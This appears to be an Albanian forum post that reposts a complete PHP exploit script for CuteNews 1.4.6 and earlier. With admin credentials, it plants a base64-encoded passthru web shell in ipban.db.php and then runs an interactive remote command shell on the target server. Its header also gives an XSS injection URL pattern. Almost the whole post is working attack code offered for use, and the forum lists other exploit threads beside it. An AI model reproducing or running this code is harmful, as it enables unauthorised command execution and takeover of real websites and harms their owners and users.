Would you like to react to this message? Create an account in a few clicks or log in to continue.


..:: Mire se erdhte ne DrenicaZone.Ch ju deshirojm caste te kendshme::..
 
ForumPortaliLatest imagesKërkoRegjistrohuidentifikimi

 

 CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.)

Shko poshtë 
AutoriMesazh
Jamee
Admin
Jamee


Numri i postimeve : 200
Registration date : 22/01/2009

CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.) Empty
MesazhTitulli: CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.)   CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.) Icon_minitimeFri Feb 06, 2009 10:04 pm

#!/usr/bin/php -q
<?php

/*********************************************************************
* CuteNews <= 1.4.6 (ip ban) XSS / Remote Command Execution Exploit *
* by athos - staker[at]hotmail[dot]it *
* http://cutephp.com *
*-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
* Remote Command Execution *
*-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
* you need a super account (administrator) *
* so you can write in ipban.db.php anything Wink *
* *
* works regardless of php.ini settings! enjoy your ais *
* note: this vuln is a privilege escalation *
* *
*-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
* Cross Site Scripting *
*-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
* http://[host]/[path]//index.php?mod=[Javascript Code] *
*********************************************************************/

error_reporting(0);

list($cli,$host,$path,$username,$password) = $argv;

if ($argc != 5) {

print "\n+-------------------------------------------------------------+\n";
print "\r| CuteNews <= 1.4.6 (ip ban) Remote Command Execution Exploit |\n";
print "\r+-------------------------------------------------------------+\n";
print "\rby athos - staker[at]hotmail[dot]it / http://cutephp.com\n\n";
print "\rUsage: php xpl.php [host] [path] [username] [password]\n\n";
print "\rhost + localhost\n";
print "\rpath + /cutenews\n";
print "\rusername + admin username\n";
print "\rpassword + admin password\n\n";
exit;
}

exploit();

function login () {

global $username,$password;

$cookies .= "username={$username}; md5_password=";
$cookies .= md5($password);

return $cookies;
}


function check_login() {

global $host,$path;

$auth .= login();

$data .= "GET /{$path}/index.php HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Cookie: $auth;\n";
$data .= "Connection: close\r\n\r\n";

if (preg_match('/Welcome/i',$data)) {
return true;
}
else {
die("Login Failed\n");
}
}


function exploit() {

global $host,$path;

$login = login();
$shell = "PD9waHAgDQpwYXNzdGhydSgkX0dFVFsnYyddKTsgDQo/Pg==";

$shell = base64_decode($shell);
$post = "add_ip={$shell}&action=add&mod=ipban";

$data .= "POST /{$path}/index.php HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Cookie: $login\r\n";
$data .= "Referer: http://{$host}/{$path}/index.php\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($post)."\r\n\r\n";
$data .= "{$post}\r\n\r\n";

if (eregi('passthru',data_send($host,$data))) {
yeat_shell();
}
else {
die("Exploit Failed!\n");
}
}


function yeat_shell() {

while (1) {
echo "yeat[shell]~$: ";
$exec = stripslashes(trim(fgets(STDIN)));

if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");
if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");
if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");

print data_exec($exec);
}
}


function data_exec($exec) {

global $host,$path;

$exec = urlencode($exec);
$data .= "GET /{$path}/data/ipban.db.php?c={$exec} HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Connection: close\r\n\r\n";

$html = data_send ($host,$data);
$html = str_replace('|0||',null,$html);
return $html;
}


function data_send ($host,$data) {

if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!\n");
} fputs($sock,$data);

while (!feof($sock)) { $html .= fgets($sock); }

fclose($sock);
return $html;
}
Mbrapsht në krye Shko poshtë
https://drenicazone.albanianforum.net
 
CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.)
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit
» Command for linux.
» VUPlayer <= 2.49 .PLS Universal Buffer Overflow Exploit
» VUPlayer <= 2.49 .PLS Universal Buffer Overflow Exploit
» Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: Shfrytëzuesit / Birucat-
Kërce tek: